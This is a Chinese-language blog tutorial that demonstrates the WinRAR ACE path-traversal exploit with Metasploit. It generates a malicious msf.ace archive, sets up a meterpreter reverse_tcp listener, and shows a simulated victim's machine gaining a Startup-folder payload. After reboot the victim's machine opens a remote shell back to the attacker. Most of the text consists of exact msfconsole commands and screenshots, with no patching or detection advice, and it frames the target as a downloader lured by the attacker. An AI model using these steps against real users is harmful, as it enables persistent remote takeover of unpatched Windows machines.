使用metasploit生成msf.ace文件
首先,你需要启动metasploit
sudo msfconsole
然后搜索winrar模块
search winrar
![图片[1]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220045326317-1024x573.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这里我们使用的是exploit/windows/fileformat/winrar_ace模块,输入
use 0
![图片[2]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220045424695-1024x574.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后,通常在使用模块的时候,你可以输入
show options
来查看有哪些需要我们进行设置的
![图片[3]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220045618831-1024x508.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们需要设置LHOST为我们的kali linux的IP地址
set LHOST 192.168.0.106
![图片[4]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220045525246-1024x574.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
如果你不知道你的kali linux的IP地址,则可以使用ifconfig去查看下
![图片[5]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220045651716.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
之后我们输入
run
可以看到我们的msf.ace已经存储在了/root/.msf4/local/msf.ace位置了
![图片[6]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220045735529-1024x575.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
设置监听端口
我们现在需要使用exploit/multi/handler模块,设置监听端口
use exploit/multi/handler
然后输入下面的命令
set payload windows/meterpreter/reverse_tcp
![图片[7]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220045917834-1024x549.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后设置LHOST为kali linux的IP地址
set LHOST 192.168.0.106
输入下面的命令开始监听
run
![图片[8]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220050034533-1024x550.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
模拟受害者
我们这里模拟热心网友,去下载了这个文件(当然,通常可能还需要一些技巧,我们这里就当作最终结果是下载了该文件)
![图片[9]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220050937147-1024x263.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们这里为了给大家更深入的进行演示,你可以在开始菜单中输入run调起下面的界面,然后输入
shell:startup
![图片[10]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051042914-1024x575.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这时,我们可以看到启动项文件目录,这里是什么都没有的
![图片[11]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051126470-1024x567.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
但是,如果我们运行了msf.ace文件,可以看到会多出一个文件
![图片[12]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051158342-1024x569.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
一旦电脑重启,就会每次加载我们的这个恶意文件
![图片[13]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051231237-1024x575.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们重启下
![图片[14]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051258277-1024x575.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
重启后登录
![图片[15]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051400102-1024x575.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后回到kali linux,可以看到我们已经接管了cmd面板
![图片[16]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051342293-1024x578.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
之后,我们可以尝试输入下命令,看看有没有效果,可以看到命令都可以正常输入
然后我们可以给热心网友一个有趣的POC ,创建一个hacked.txt文本,其中写上”sweet dreams“(当然,你也可以写其他的,比方说”你已经被黑了,老弟“)
echo "sweet dreams" > hacked.txt
然后打开这个文本
notepad hacked.txt
![图片[17]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051500867-1024x574.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后,我们回到热心网友的Windows界面,可以看到记事本弹出来了
![图片[18]-电脑重启也可以被远控 | 一个神奇的WinRAR文件-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2023/02/20230220051705325-1024x574.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
至此,演示结束。
暂无评论内容